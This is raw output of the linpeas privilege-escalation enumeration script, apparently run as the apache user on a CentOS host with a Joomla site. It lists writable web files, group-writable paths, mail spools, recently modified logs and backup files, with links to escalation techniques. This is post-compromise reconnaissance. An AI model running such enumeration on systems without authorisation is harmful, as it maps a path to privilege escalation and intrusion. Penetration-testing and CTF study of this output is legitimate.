/var/tmp/yum-apache-Oxz_mT/x86_64
/var/tmp/yum-apache-Oxz_mT/x86_64/7
/var/tmp/yum-apache-Oxz_mT/x86_64/7/base
/var/tmp/yum-apache-Oxz_mT/x86_64/7/base/cachecookie
/var/tmp/yum-apache-Oxz_mT/x86_64/7/base/gen
/var/tmp/yum-apache-Oxz_mT/x86_64/7/base/mirrorlist.txt
/var/tmp/yum-apache-Oxz_mT/x86_64/7/base/packages
/var/tmp/yum-apache-Oxz_mT/x86_64/7/base/repomd.xml
/var/tmp/yum-apache-Oxz_mT/x86_64/7/epel
/var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/cachecookie
/var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/gen
/var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/metalink.xml
/var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/packages
/var/tmp/yum-apache-Oxz_mT/x86_64/7/epel/repomd.xml
/var/tmp/yum-apache-Oxz_mT/x86_64/7/extras
/var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/cachecookie
/var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/gen
/var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/mirrorlist.txt
/var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/packages
/var/tmp/yum-apache-Oxz_mT/x86_64/7/extras/repomd.xml
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/cachecookie
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/gen
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/mirrorlist.txt
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/packages
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-php56/repomd.xml
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/cachecookie
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/gen
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/mirrorlist.txt
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/packages
/var/tmp/yum-apache-Oxz_mT/x86_64/7/remi-safe/repomd.xml
/var/tmp/yum-apache-Oxz_mT/x86_64/7/updates
/var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/cachecookie
/var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/gen
/var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/mirrorlist.txt
/var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/packages
/var/tmp/yum-apache-Oxz_mT/x86_64/7/updates/repomd.xml
/var/www/html
/var/www/html/LICENSE.txt
/var/www/html/README.txt
/var/www/html/administrator
/var/www/html/administrator/cache
/var/www/html/administrator/cache/index.html
/var/www/html/administrator/components
/var/www/html/administrator/components/com_admin
/var/www/html/administrator/components/com_admin/admin.php
/var/www/html/administrator/components/com_admin/admin.xml
/var/www/html/administrator/components/com_admin/controller.php
/var/www/html/administrator/components/com_admin/controllers
/var/www/html/administrator/components/com_admin/controllers/profile.php
/var/www/html/administrator/components/com_admin/helpers
/var/www/html/administrator/components/com_admin/helpers/html
/var/www/html/administrator/components/com_admin/helpers/html/directory.php
/var/www/html/administrator/components/com_admin/helpers/html/phpsetting.php
/var/www/html/administrator/components/com_admin/helpers/html/system.php
/var/www/html/administrator/components/com_admin/models
/var/www/html/administrator/components/com_admin/models/forms
/var/www/html/administrator/components/com_admin/models/forms/profile.xml
/var/www/html/administrator/components/com_admin/models/help.php
/var/www/html/administrator/components/com_admin/models/profile.php
/var/www/html/administrator/components/com_admin/models/sysinfo.php
/var/www/html/administrator/components/com_admin/postinstall
/var/www/html/administrator/components/com_admin/postinstall/eaccelerator.php
/var/www/html/administrator/components/com_admin/postinstall/htaccess.php
/var/www/html/administrator/components/com_admin/postinstall/joomla40checks.php
/var/www/html/administrator/components/com_admin/postinstall/languageaccess340.php
/var/www/html/administrator/components/com_admin/postinstall/phpversion.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_admin/script.php
/var/www/html/administrator/components/com_admin/sql
/var/www/html/administrator/components/com_admin/sql/others
/var/www/html/administrator/components/com_admin/sql/others/mysql
/var/www/html/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-01.sql
/var/www/html/administrator/components/com_admin/sql/others/mysql/utf8mb4-conversion-02.sql
/var/www/html/administrator/components/com_admin/sql/updates
/var/www/html/administrator/components/com_admin/sql/updates/mysql
/var/www/html/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-06.sql
/var/www/html/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-16.sql
/var/www/html/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-19.sql
/var/www/html/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-20.sql
/var/www/html/administrator/components/com_admin/sql/updates/mysql/2.5.0-2011-12-21-1.sql
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_admin/sql/updates/postgresql
/var/www/html/administrator/components/com_admin/sql/updates/postgresql/3.0.0.sql
/var/www/html/administrator/components/com_admin/sql/updates/postgresql/3.0.1.sql
/var/www/html/administrator/components/com_admin/sql/updates/postgresql/3.0.2.sql
/var/www/html/administrator/components/com_admin/sql/updates/postgresql/3.0.3.sql
/var/www/html/administrator/components/com_admin/sql/updates/postgresql/3.1.0.sql
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_admin/sql/updates/sqlazure
/var/www/html/administrator/components/com_admin/sql/updates/sqlazure/2.5.2-2012-03-05.sql
/var/www/html/administrator/components/com_admin/sql/updates/sqlazure/2.5.3-2012-03-13.sql
/var/www/html/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-18.sql
/var/www/html/administrator/components/com_admin/sql/updates/sqlazure/2.5.4-2012-03-19.sql
/var/www/html/administrator/components/com_admin/sql/updates/sqlazure/2.5.5.sql
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_admin/views
/var/www/html/administrator/components/com_admin/views/help
/var/www/html/administrator/components/com_admin/views/help/tmpl
/var/www/html/administrator/components/com_admin/views/help/tmpl/default.php
/var/www/html/administrator/components/com_admin/views/help/tmpl/default.xml
/var/www/html/administrator/components/com_admin/views/help/view.html.php
/var/www/html/administrator/components/com_admin/views/profile
/var/www/html/administrator/components/com_admin/views/profile/tmpl
/var/www/html/administrator/components/com_admin/views/profile/tmpl/edit.php
/var/www/html/administrator/components/com_admin/views/profile/view.html.php
/var/www/html/administrator/components/com_admin/views/sysinfo
/var/www/html/administrator/components/com_admin/views/sysinfo/tmpl
/var/www/html/administrator/components/com_admin/views/sysinfo/tmpl/default.php
/var/www/html/administrator/components/com_admin/views/sysinfo/tmpl/default.xml
/var/www/html/administrator/components/com_admin/views/sysinfo/tmpl/default_config.php
/var/www/html/administrator/components/com_admin/views/sysinfo/tmpl/default_directory.php
/var/www/html/administrator/components/com_admin/views/sysinfo/tmpl/default_phpinfo.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_admin/views/sysinfo/view.html.php
/var/www/html/administrator/components/com_admin/views/sysinfo/view.json.php
/var/www/html/administrator/components/com_admin/views/sysinfo/view.text.php
/var/www/html/administrator/components/com_ajax
/var/www/html/administrator/components/com_ajax/ajax.php
/var/www/html/administrator/components/com_ajax/ajax.xml
/var/www/html/administrator/components/com_associations
/var/www/html/administrator/components/com_associations/access.xml
/var/www/html/administrator/components/com_associations/associations.php
/var/www/html/administrator/components/com_associations/associations.xml
/var/www/html/administrator/components/com_associations/config.xml
/var/www/html/administrator/components/com_associations/controller.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_associations/controllers/association.php
/var/www/html/administrator/components/com_associations/controllers/associations.php
/var/www/html/administrator/components/com_associations/helpers
/var/www/html/administrator/components/com_associations/helpers/associations.php
/var/www/html/administrator/components/com_associations/layouts
/var/www/html/administrator/components/com_associations/layouts/joomla
/var/www/html/administrator/components/com_associations/layouts/joomla/searchtools
/var/www/html/administrator/components/com_associations/layouts/joomla/searchtools/default
/var/www/html/administrator/components/com_associations/layouts/joomla/searchtools/default/bar.php
/var/www/html/administrator/components/com_associations/models
/var/www/html/administrator/components/com_associations/models/association.php
/var/www/html/administrator/components/com_associations/models/associations.php
/var/www/html/administrator/components/com_associations/models/fields
/var/www/html/administrator/components/com_associations/models/fields/itemlanguage.php
/var/www/html/administrator/components/com_associations/models/fields/itemtype.php
/var/www/html/administrator/components/com_associations/models/fields/modalassociation.php
/var/www/html/administrator/components/com_associations/models/forms
/var/www/html/administrator/components/com_associations/models/forms/association.xml
/var/www/html/administrator/components/com_associations/models/forms/filter_associations.xml
/var/www/html/administrator/components/com_associations/views
/var/www/html/administrator/components/com_associations/views/association
/var/www/html/administrator/components/com_associations/views/association/tmpl
/var/www/html/administrator/components/com_associations/views/association/tmpl/edit.php
/var/www/html/administrator/components/com_associations/views/association/view.html.php
/var/www/html/administrator/components/com_associations/views/associations
/var/www/html/administrator/components/com_associations/views/associations/tmpl
/var/www/html/administrator/components/com_associations/views/associations/tmpl/default.php
/var/www/html/administrator/components/com_associations/views/associations/tmpl/modal.php
/var/www/html/administrator/components/com_associations/views/associations/view.html.php
/var/www/html/administrator/components/com_banners
/var/www/html/administrator/components/com_banners/access.xml
/var/www/html/administrator/components/com_banners/banners.php
/var/www/html/administrator/components/com_banners/banners.xml
/var/www/html/administrator/components/com_banners/config.xml
/var/www/html/administrator/components/com_banners/controller.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_banners/controllers/banner.php
/var/www/html/administrator/components/com_banners/controllers/banners.php
/var/www/html/administrator/components/com_banners/controllers/client.php
/var/www/html/administrator/components/com_banners/controllers/clients.php
/var/www/html/administrator/components/com_banners/controllers/tracks.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_banners/helpers
/var/www/html/administrator/components/com_banners/helpers/banners.php
/var/www/html/administrator/components/com_banners/helpers/html
/var/www/html/administrator/components/com_banners/helpers/html/banner.php
/var/www/html/administrator/components/com_banners/models
/var/www/html/administrator/components/com_banners/models/banner.php
/var/www/html/administrator/components/com_banners/models/banners.php
/var/www/html/administrator/components/com_banners/models/client.php
/var/www/html/administrator/components/com_banners/models/clients.php
/var/www/html/administrator/components/com_banners/models/download.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_banners/models/fields/bannerclient.php
/var/www/html/administrator/components/com_banners/models/fields/clicks.php
/var/www/html/administrator/components/com_banners/models/fields/impmade.php
/var/www/html/administrator/components/com_banners/models/fields/imptotal.php
/var/www/html/administrator/components/com_banners/models/forms
/var/www/html/administrator/components/com_banners/models/forms/banner.xml
/var/www/html/administrator/components/com_banners/models/forms/client.xml
/var/www/html/administrator/components/com_banners/models/forms/download.xml
/var/www/html/administrator/components/com_banners/models/forms/filter_banners.xml
/var/www/html/administrator/components/com_banners/models/forms/filter_clients.xml
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_banners/models/tracks.php
/var/www/html/administrator/components/com_banners/sql
/var/www/html/administrator/components/com_banners/sql/install.mysql.utf8.sql
/var/www/html/administrator/components/com_banners/sql/uninstall.mysql.utf8.sql
/var/www/html/administrator/components/com_banners/tables
/var/www/html/administrator/components/com_banners/tables/banner.php
/var/www/html/administrator/components/com_banners/tables/client.php
/var/www/html/administrator/components/com_banners/views
/var/www/html/administrator/components/com_banners/views/banner
/var/www/html/administrator/components/com_banners/views/banner/tmpl
/var/www/html/administrator/components/com_banners/views/banner/tmpl/edit.php
/var/www/html/administrator/components/com_banners/views/banner/view.html.php
/var/www/html/administrator/components/com_banners/views/banners
/var/www/html/administrator/components/com_banners/views/banners/tmpl
/var/www/html/administrator/components/com_banners/views/banners/tmpl/default.php
/var/www/html/administrator/components/com_banners/views/banners/tmpl/default_batch_body.php
/var/www/html/administrator/components/com_banners/views/banners/tmpl/default_batch_footer.php
/var/www/html/administrator/components/com_banners/views/banners/view.html.php
/var/www/html/administrator/components/com_banners/views/client
/var/www/html/administrator/components/com_banners/views/client/tmpl
/var/www/html/administrator/components/com_banners/views/client/tmpl/edit.php
/var/www/html/administrator/components/com_banners/views/client/view.html.php
/var/www/html/administrator/components/com_banners/views/clients
/var/www/html/administrator/components/com_banners/views/clients/tmpl
/var/www/html/administrator/components/com_banners/views/clients/tmpl/default.php
/var/www/html/administrator/components/com_banners/views/clients/view.html.php
/var/www/html/administrator/components/com_banners/views/download
/var/www/html/administrator/components/com_banners/views/download/tmpl
/var/www/html/administrator/components/com_banners/views/download/tmpl/default.php
/var/www/html/administrator/components/com_banners/views/download/view.html.php
/var/www/html/administrator/components/com_banners/views/tracks
/var/www/html/administrator/components/com_banners/views/tracks/tmpl
/var/www/html/administrator/components/com_banners/views/tracks/tmpl/default.php
/var/www/html/administrator/components/com_banners/views/tracks/view.html.php
/var/www/html/administrator/components/com_banners/views/tracks/view.raw.php
/var/www/html/administrator/components/com_cache
/var/www/html/administrator/components/com_cache/cache.php
/var/www/html/administrator/components/com_cache/cache.xml
/var/www/html/administrator/components/com_cache/config.xml
/var/www/html/administrator/components/com_cache/controller.php
/var/www/html/administrator/components/com_cache/helpers
/var/www/html/administrator/components/com_cache/helpers/cache.php
/var/www/html/administrator/components/com_cache/models
/var/www/html/administrator/components/com_cache/models/cache.php
/var/www/html/administrator/components/com_cache/models/forms
/var/www/html/administrator/components/com_cache/models/forms/filter_cache.xml
/var/www/html/administrator/components/com_cache/views
/var/www/html/administrator/components/com_cache/views/cache
/var/www/html/administrator/components/com_cache/views/cache/tmpl
/var/www/html/administrator/components/com_cache/views/cache/tmpl/default.php
/var/www/html/administrator/components/com_cache/views/cache/tmpl/default.xml
/var/www/html/administrator/components/com_cache/views/cache/view.html.php
/var/www/html/administrator/components/com_cache/views/purge
/var/www/html/administrator/components/com_cache/views/purge/tmpl
/var/www/html/administrator/components/com_cache/views/purge/tmpl/default.php
/var/www/html/administrator/components/com_cache/views/purge/tmpl/default.xml
/var/www/html/administrator/components/com_cache/views/purge/view.html.php
/var/www/html/administrator/components/com_categories
/var/www/html/administrator/components/com_categories/categories.php
/var/www/html/administrator/components/com_categories/categories.xml
/var/www/html/administrator/components/com_categories/controller.php
/var/www/html/administrator/components/com_categories/controllers
/var/www/html/administrator/components/com_categories/controllers/categories.php
/var/www/html/administrator/components/com_categories/controllers/category.php
/var/www/html/administrator/components/com_categories/helpers
/var/www/html/administrator/components/com_categories/helpers/association.php
/var/www/html/administrator/components/com_categories/helpers/categories.php
/var/www/html/administrator/components/com_categories/helpers/html
/var/www/html/administrator/components/com_categories/helpers/html/categoriesadministrator.php
/var/www/html/administrator/components/com_categories/models
/var/www/html/administrator/components/com_categories/models/categories.php
/var/www/html/administrator/components/com_categories/models/category.php
/var/www/html/administrator/components/com_categories/models/fields
/var/www/html/administrator/components/com_categories/models/fields/categoryedit.php
/var/www/html/administrator/components/com_categories/models/fields/categoryparent.php
/var/www/html/administrator/components/com_categories/models/fields/modal
/var/www/html/administrator/components/com_categories/models/fields/modal/category.php
/var/www/html/administrator/components/com_categories/models/forms
/var/www/html/administrator/components/com_categories/models/forms/category.xml
/var/www/html/administrator/components/com_categories/models/forms/filter_categories.xml
/var/www/html/administrator/components/com_categories/tables
/var/www/html/administrator/components/com_categories/tables/category.php
/var/www/html/administrator/components/com_categories/views
/var/www/html/administrator/components/com_categories/views/categories
/var/www/html/administrator/components/com_categories/views/categories/tmpl
/var/www/html/administrator/components/com_categories/views/categories/tmpl/default.php
/var/www/html/administrator/components/com_categories/views/categories/tmpl/default.xml
/var/www/html/administrator/components/com_categories/views/categories/tmpl/default_batch_body.php
/var/www/html/administrator/components/com_categories/views/categories/tmpl/default_batch_footer.php
/var/www/html/administrator/components/com_categories/views/categories/tmpl/modal.php
/var/www/html/administrator/components/com_categories/views/categories/view.html.php
/var/www/html/administrator/components/com_categories/views/category
/var/www/html/administrator/components/com_categories/views/category/tmpl
/var/www/html/administrator/components/com_categories/views/category/tmpl/edit.php
/var/www/html/administrator/components/com_categories/views/category/tmpl/edit.xml
/var/www/html/administrator/components/com_categories/views/category/tmpl/edit_associations.php
/var/www/html/administrator/components/com_categories/views/category/tmpl/edit_metadata.php
/var/www/html/administrator/components/com_categories/views/category/tmpl/modal.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_categories/views/category/view.html.php
/var/www/html/administrator/components/com_checkin
/var/www/html/administrator/components/com_checkin/checkin.php
/var/www/html/administrator/components/com_checkin/checkin.xml
/var/www/html/administrator/components/com_checkin/config.xml
/var/www/html/administrator/components/com_checkin/controller.php
/var/www/html/administrator/components/com_checkin/models
/var/www/html/administrator/components/com_checkin/models/checkin.php
/var/www/html/administrator/components/com_checkin/models/forms
/var/www/html/administrator/components/com_checkin/models/forms/filter_checkin.xml
/var/www/html/administrator/components/com_checkin/views
/var/www/html/administrator/components/com_checkin/views/checkin
/var/www/html/administrator/components/com_checkin/views/checkin/tmpl
/var/www/html/administrator/components/com_checkin/views/checkin/tmpl/default.php
/var/www/html/administrator/components/com_checkin/views/checkin/tmpl/default.xml
/var/www/html/administrator/components/com_checkin/views/checkin/view.html.php
/var/www/html/administrator/components/com_config
/var/www/html/administrator/components/com_config/access.xml
/var/www/html/administrator/components/com_config/config.php
/var/www/html/administrator/components/com_config/config.xml
/var/www/html/administrator/components/com_config/controller
/var/www/html/administrator/components/com_config/controller.php
/var/www/html/administrator/components/com_config/controller/application
/var/www/html/administrator/components/com_config/controller/application/cancel.php
/var/www/html/administrator/components/com_config/controller/application/display.php
/var/www/html/administrator/components/com_config/controller/application/removeroot.php
/var/www/html/administrator/components/com_config/controller/application/save.php
/var/www/html/administrator/components/com_config/controller/application/sendtestmail.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_config/controller/component
/var/www/html/administrator/components/com_config/controller/component/cancel.php
/var/www/html/administrator/components/com_config/controller/component/display.php
/var/www/html/administrator/components/com_config/controller/component/save.php
/var/www/html/administrator/components/com_config/controllers
/var/www/html/administrator/components/com_config/controllers/application.php
/var/www/html/administrator/components/com_config/controllers/component.php
/var/www/html/administrator/components/com_config/helper
/var/www/html/administrator/components/com_config/helper/config.php
/var/www/html/administrator/components/com_config/model
/var/www/html/administrator/components/com_config/model/application.php
/var/www/html/administrator/components/com_config/model/component.php
/var/www/html/administrator/components/com_config/model/field
/var/www/html/administrator/components/com_config/model/field/configcomponents.php
/var/www/html/administrator/components/com_config/model/field/filters.php
/var/www/html/administrator/components/com_config/model/form
/var/www/html/administrator/components/com_config/model/form/application.xml
/var/www/html/administrator/components/com_config/models
/var/www/html/administrator/components/com_config/models/application.php
/var/www/html/administrator/components/com_config/models/component.php
/var/www/html/administrator/components/com_config/view
/var/www/html/administrator/components/com_config/view/application
/var/www/html/administrator/components/com_config/view/application/html.php
/var/www/html/administrator/components/com_config/view/application/json.php
/var/www/html/administrator/components/com_config/view/application/tmpl
/var/www/html/administrator/components/com_config/view/application/tmpl/default.php
/var/www/html/administrator/components/com_config/view/application/tmpl/default.xml
/var/www/html/administrator/components/com_config/view/application/tmpl/default_cache.php
/var/www/html/administrator/components/com_config/view/application/tmpl/default_cookie.php
/var/www/html/administrator/components/com_config/view/application/tmpl/default_database.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_config/view/component
/var/www/html/administrator/components/com_config/view/component/html.php
/var/www/html/administrator/components/com_config/view/component/tmpl
/var/www/html/administrator/components/com_config/view/component/tmpl/default.php
/var/www/html/administrator/components/com_config/view/component/tmpl/default.xml
/var/www/html/administrator/components/com_config/view/component/tmpl/default_navigation.php
/var/www/html/administrator/components/com_contact
/var/www/html/administrator/components/com_contact/access.xml
/var/www/html/administrator/components/com_contact/config.xml
/var/www/html/administrator/components/com_contact/contact.php
/var/www/html/administrator/components/com_contact/contact.xml
/var/www/html/administrator/components/com_contact/controller.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_contact/controllers/contact.php
/var/www/html/administrator/components/com_contact/controllers/contacts.php
/var/www/html/administrator/components/com_contact/helpers
/var/www/html/administrator/components/com_contact/helpers/associations.php
/var/www/html/administrator/components/com_contact/helpers/contact.php
/var/www/html/administrator/components/com_contact/helpers/html
/var/www/html/administrator/components/com_contact/helpers/html/contact.php
/var/www/html/administrator/components/com_contact/models
/var/www/html/administrator/components/com_contact/models/contact.php
/var/www/html/administrator/components/com_contact/models/contacts.php
/var/www/html/administrator/components/com_contact/models/fields
/var/www/html/administrator/components/com_contact/models/fields/modal
/var/www/html/administrator/components/com_contact/models/fields/modal/contact.php
/var/www/html/administrator/components/com_contact/models/forms
/var/www/html/administrator/components/com_contact/models/forms/contact.xml
/var/www/html/administrator/components/com_contact/models/forms/filter_contacts.xml
/var/www/html/administrator/components/com_contact/sql
/var/www/html/administrator/components/com_contact/sql/install.mysql.utf8.sql
/var/www/html/administrator/components/com_contact/sql/uninstall.mysql.utf8.sql
/var/www/html/administrator/components/com_contact/tables
/var/www/html/administrator/components/com_contact/tables/contact.php
/var/www/html/administrator/components/com_contact/views
/var/www/html/administrator/components/com_contact/views/contact
/var/www/html/administrator/components/com_contact/views/contact/tmpl
/var/www/html/administrator/components/com_contact/views/contact/tmpl/edit.php
/var/www/html/administrator/components/com_contact/views/contact/tmpl/edit_associations.php
/var/www/html/administrator/components/com_contact/views/contact/tmpl/edit_metadata.php
/var/www/html/administrator/components/com_contact/views/contact/tmpl/edit_params.php
/var/www/html/administrator/components/com_contact/views/contact/tmpl/modal.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_contact/views/contact/view.html.php
/var/www/html/administrator/components/com_contact/views/contacts
/var/www/html/administrator/components/com_contact/views/contacts/tmpl
/var/www/html/administrator/components/com_contact/views/contacts/tmpl/default.php
/var/www/html/administrator/components/com_contact/views/contacts/tmpl/default_batch.php
/var/www/html/administrator/components/com_contact/views/contacts/tmpl/default_batch_body.php
/var/www/html/administrator/components/com_contact/views/contacts/tmpl/default_batch_footer.php
/var/www/html/administrator/components/com_contact/views/contacts/tmpl/modal.php
/var/www/html/administrator/components/com_contact/views/contacts/view.html.php
/var/www/html/administrator/components/com_content
/var/www/html/administrator/components/com_content/access.xml
/var/www/html/administrator/components/com_content/config.xml
/var/www/html/administrator/components/com_content/content.php
/var/www/html/administrator/components/com_content/content.xml
/var/www/html/administrator/components/com_content/controller.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_content/controllers/article.php
/var/www/html/administrator/components/com_content/controllers/articles.php
/var/www/html/administrator/components/com_content/controllers/featured.php
/var/www/html/administrator/components/com_content/helpers
/var/www/html/administrator/components/com_content/helpers/associations.php
/var/www/html/administrator/components/com_content/helpers/content.php
/var/www/html/administrator/components/com_content/helpers/html
/var/www/html/administrator/components/com_content/helpers/html/contentadministrator.php
/var/www/html/administrator/components/com_content/models
/var/www/html/administrator/components/com_content/models/article.php
/var/www/html/administrator/components/com_content/models/articles.php
/var/www/html/administrator/components/com_content/models/feature.php
/var/www/html/administrator/components/com_content/models/featured.php
/var/www/html/administrator/components/com_content/models/fields
/var/www/html/administrator/components/com_content/models/fields/modal
/var/www/html/administrator/components/com_content/models/fields/modal/article.php
/var/www/html/administrator/components/com_content/models/forms
/var/www/html/administrator/components/com_content/models/forms/article.xml
/var/www/html/administrator/components/com_content/models/forms/filter_articles.xml
/var/www/html/administrator/components/com_content/models/forms/filter_featured.xml
/var/www/html/administrator/components/com_content/tables
/var/www/html/administrator/components/com_content/tables/featured.php
/var/www/html/administrator/components/com_content/views
/var/www/html/administrator/components/com_content/views/article
/var/www/html/administrator/components/com_content/views/article/tmpl
/var/www/html/administrator/components/com_content/views/article/tmpl/edit.php
/var/www/html/administrator/components/com_content/views/article/tmpl/edit.xml
/var/www/html/administrator/components/com_content/views/article/tmpl/edit_associations.php
/var/www/html/administrator/components/com_content/views/article/tmpl/edit_metadata.php
/var/www/html/administrator/components/com_content/views/article/tmpl/modal.php
#)You_can_write_even_more_files_inside_last_directory

/var/www/html/administrator/components/com_content/views/article/view.html.php
/var/www/html/administrator/components/com_content/views/articles
/var/www/html/administrator/components/com_content/views/articles/tmpl
/var/www/html/administrator/components/com_content/views/articles/tmpl/default.php
/var/www/html/administrator/components/com_content/views/articles/tmpl/default.xml
/var/www/html/administrator/components/com_content/views/articles/tmpl/default_batch_body.php
/var/www/html/administrator/components/com_content/views/articles/tmpl/default_batch_footer.php
/var/www/html/administrator/components/com_content/views/articles/tmpl/modal.php
/var/www/html/administrator/components/com_content/views/articles/view.html.php
/var/www/html/administrator/components/com_content/views/featured
/var/www/html/administrator/components/com_content/views/featured/tmpl
/var/www/html/administrator/components/com_content/views/featured/tmpl/default.php
/var/www/html/administrator/components/com_content/views/featured/tmpl/default.xml
/var/www/html/administrator/components/com_content/views/featured/view.html.php
/var/www/html/administrator/components/com_contenthistory
/var/www/html/administrator/components/com_contenthistory/contenthistory.php
/var/www/html/administrator/components/com_contenthistory/contenthistory.xml
/var/www/html/administrator/components/com_contenthistory/controller.php
/var/www/html/administrator/components/com_contenthistory/controllers
/var/www/html/administrator/components/com_contenthistory/controllers/history.php
/var/www/html/administrator/components/com_contenthistory/controllers/preview.php
/var/www/html/administrator/components/com_contenthistory/helpers
/var/www/html/administrator/components/com_contenthistory/helpers/contenthistory.php
/var/www/html/administrator/components/com_contenthistory/helpers/html
/var/www/html/administrator/components/com_contenthistory/helpers/html/textdiff.php
/var/www/html/administrator/components/com_contenthistory/models
/var/www/html/administrator/components/com_contenthistory/models/compare.php
/var/www/html/administrator/components/com_contenthistory/models/history.php
/var/www/html/administrator/components/com_contenthistory/models/preview.php
/var/www/html/administrator/components/com_contenthistory/views
/var/www/html/administrator/components/com_contenthistory/views/compare
/var/www/html/administrator/components/com_contenthistory/views/compare/tmpl

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
  Group apache:
/var/lib/php/session
/var/lib/php/wsdlcache
/var/www/html/linpease.log
/tmp/linpeas.sh



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/lesspipe.sh
/usr/bin/gettext.sh
/usr/bin/setup-nsssysinit.sh
/usr/bin/rescan-scsi-bus.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2020-01-14+18:27:41.2078866600 /etc/rc.d/rc.local
2019-12-14+15:45:37.0299930380 /var/www/html/plugins/quickicon/phpversioncheck/phpversioncheck.php

╔══════════╣ Unexpected in root
/.autorelabel

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/cron
/var/log/messages
/var/log/secure


╔══════════╣ Files inside /home/apache (limit 20)

╔══════════╣ Files inside others home (limit 20)
/var/www/html/LICENSE.txt
/var/www/html/README.txt
/var/www/html/administrator/cache/index.html
/var/www/html/administrator/components/com_admin/admin.php
/var/www/html/administrator/components/com_admin/admin.xml
/var/www/html/administrator/components/com_admin/controller.php
/var/www/html/administrator/components/com_admin/controllers/profile.php
/var/www/html/administrator/components/com_admin/helpers/html/directory.php
/var/www/html/administrator/components/com_admin/helpers/html/phpsetting.php
/var/www/html/administrator/components/com_admin/helpers/html/system.php
/var/www/html/administrator/components/com_admin/models/forms/profile.xml
/var/www/html/administrator/components/com_admin/models/help.php
/var/www/html/administrator/components/com_admin/models/profile.php
/var/www/html/administrator/components/com_admin/models/sysinfo.php
/var/www/html/administrator/components/com_admin/postinstall/eaccelerator.php
/var/www/html/administrator/components/com_admin/postinstall/htaccess.php
/var/www/html/administrator/components/com_admin/postinstall/joomla40checks.php
/var/www/html/administrator/components/com_admin/postinstall/languageaccess340.php
/var/www/html/administrator/components/com_admin/postinstall/phpversion.php
/var/www/html/administrator/components/com_admin/postinstall/statscollection.php

╔══════════╣ Searching installed mail applications
mailq.postfix
newaliases.postfix
postfix
rmail.postfix
sendmail
sendmail.postfix

╔══════════╣ Mails (limit 50)
9244504    0 -rw-rw----   1 jjameson mail            0 Dec 14  2019 /var/mail/jjameson
8405220    4 -rw-------   1 root     mail          675 Oct  1 00:42 /var/mail/root
9244504    0 -rw-rw----   1 jjameson mail            0 Dec 14  2019 /var/spool/mail/jjameson
8405220    4 -rw-------   1 root     mail          675 Oct  1 00:42 /var/spool/mail/root

╔══════════╣ Backup files (limited 100)
-rw-r--r--. 1 root root 1938 Aug  6  2019 /etc/nsswitch.conf.bak
-rw-r--r-- 1 root root 32791 Jan 14  2020 /var/log/dmesg.old
-rw-r--r--. 1 root root 2276 Aug  7  2019 /usr/lib/modules/3.10.0-1062.el7.x86_64/kernel/drivers/net/team/team_mode_activebackup.ko.xz
-rw-r--r--. 1 root root 475 Mar 29  2019 /usr/share/doc/initscripts-9.49.47/examples/networking/ifcfg-bond-activebackup-arpmon
-rw-r--r--. 1 root root 393 Mar 29  2019 /usr/share/doc/initscripts-9.49.47/examples/networking/ifcfg-bond-activebackup-miimon
-rw-r--r--. 1 root root 305 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_arp_ping_1.conf
-rw-r--r--. 1 root root 465 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_arp_ping_2.conf
-rw-r--r--. 1 root root 194 Mar 17  2017 /usr/share/doc/teamd-1.27/example_configs/activebackup_ethtool_1.conf
